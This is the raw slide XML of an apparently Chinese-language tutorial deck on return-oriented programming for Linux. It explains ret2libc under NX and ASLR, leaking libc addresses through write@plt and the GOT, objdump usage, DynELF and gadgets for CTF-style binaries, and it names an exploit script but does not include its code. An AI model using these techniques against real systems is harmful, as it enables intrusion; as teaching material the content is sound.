              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>]/maps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zh-CN" altLang="en-US" dirty="0"/>
              <a:t>执行的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>level2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2" y="2785504"/>
            <a:ext cx="7228571" cy="13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06" y="4650486"/>
            <a:ext cx="7104762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12" y="4085154"/>
            <a:ext cx="3857127" cy="25264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160337"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>0x03 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>ROP-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>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935" y="132065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已开启</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>ASLR</a:t>
            </a:r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zh-CN" altLang="en-US" dirty="0"/>
              <a:t>先泄漏出</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>libc.so</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>某些函数在内存中的地址，然后再利用泄漏出的函数地址根据偏移量计算出</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>system()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>函数和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zh-CN" altLang="en-US" dirty="0"/>
              <a:t>字符串在内存中的地址，然后再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ret2libc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>shellcode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既然栈，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>libc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>heap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的地址都是随机的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>。怎么</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>才能泄露出</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>libc.so</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的地址呢</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>？方法是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>有的，因为程序本身在内存中的地址并不是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>随机的</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>只要把返回值设置到程序本身就可执行我们期望的指令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2" descr="enter image description here"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="554535" y="8755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enter image description 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160337"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>0x03 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>ROP-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>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935" y="1320658"/>
            <a:ext cx="10515600" cy="4351338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objdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>来查看可以利用的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>plt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>函数和函数对应的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>got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/>
              <a:t>objdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> -d -j .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>plt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>level2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objdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>-R level2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2" descr="enter image description here"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="554535" y="8755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enter image description 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75" y="1792339"/>
            <a:ext cx="6428571" cy="4638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3834827"/>
            <a:ext cx="5190476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160337"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>0x03 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>ROP-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>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935" y="1320657"/>
            <a:ext cx="10726240" cy="53530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01 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>获取</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>write()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>函数地址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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>除了程序本身的实现的函数之外</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，还</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>可以使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>read@plt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write@plt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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>因为程序本身并没有调用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>system()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>函数，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>所以并不</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>能直接调用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>system()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>来获取</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>shell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但有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>write@plt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r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>就可以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>write@plt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> ()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>函数把</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>write()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>函数在内存中的地址也就是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>write.got</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>给打印出来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既然</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>write()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>函数实现是在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>libc.so</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>当中，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>那调用数</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>为什么也能实现</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>write()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>功能呢</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>write@plt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>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是因为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>采用了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>延时绑定技术</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>当调用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>write@plit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的时候，系统会将真正的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>write()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>函数地址</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>link</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>got</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>表的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>write.got</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>中，然后</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>write@plit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>会根据</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>write.got</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>跳转到真正的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>write()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>函数上去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2" descr="enter image description here"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="554535" y="8755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enter image description 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021"/>
            <a:ext cx="10994409" cy="50323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（一）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ROP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Linux_x86</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>0x01</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>程序流劫持</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>0x02 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ret2libc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 smtClean="0"/>
              <a:t>防护</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>0x03 ROP-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>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 smtClean="0"/>
              <a:t>防护</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>0x04</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Memory Leak &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>DynELF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>在不获取目标</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>libc.so</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的情况下进行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ROP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>攻击</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（二）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ROP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Linux_x64</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>0x00 linux_64</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>与</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>linux_86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en-US" altLang="zh-CN" dirty="0"/>
              <a:t>0x01 linux_x64 </a:t>
            </a:r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/>
              <a:t>0x02</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>使用工具寻找</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>gadgets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>示例</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>0x03 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>通用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>gadgets</a:t>
            </a:r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160337"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>0x03 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>ROP-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>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935" y="1320657"/>
            <a:ext cx="10726240" cy="53530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02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system()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>函数地址</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/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system()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>函数和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>write()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>libc.so</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>中的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>offset(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>相对地址</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>是不变的，所以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>如果得到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>write()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的地址并且拥有目标服务器上的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>libc.so</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>就可以计算出</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>system()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>在内存中的地址了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然后再</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>pc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>指针</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>return</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>回</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>vulnerable_function</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>函数，就可以进行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ret2libc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>溢出攻击，并且这一</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>次知道</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>system()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>在内存中的地址，就可以调用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>system()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>函数来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shell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="AutoShape 2" descr="enter image description here"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="554535" y="8755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enter image description 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535" y="-86502"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>0x03 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>ROP-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>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935" y="1320657"/>
            <a:ext cx="10726240" cy="53530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03 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>exp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>exp3.py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2" descr="enter image description here"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="554535" y="8755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enter image description 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7975" y="3780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9335" y="310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35" y="834248"/>
            <a:ext cx="7581900" cy="60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535" y="-86502"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>0x03 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>ROP-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>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/>
              <a:t>防护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935" y="1320657"/>
            <a:ext cx="10726240" cy="53530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03 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>exp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>exp3.py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2" descr="enter image description here"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="554535" y="8755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enter image description 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7975" y="3780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9335" y="310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875505"/>
            <a:ext cx="10629900" cy="6410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05" y="4960331"/>
            <a:ext cx="8647619" cy="2276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86" y="4648476"/>
            <a:ext cx="6209524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6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867" y="160409"/>
            <a:ext cx="11258266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0x04</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Memory Leak &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>DynELF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>在不获取目标</a:t>
            </a:r>
            <a:r>
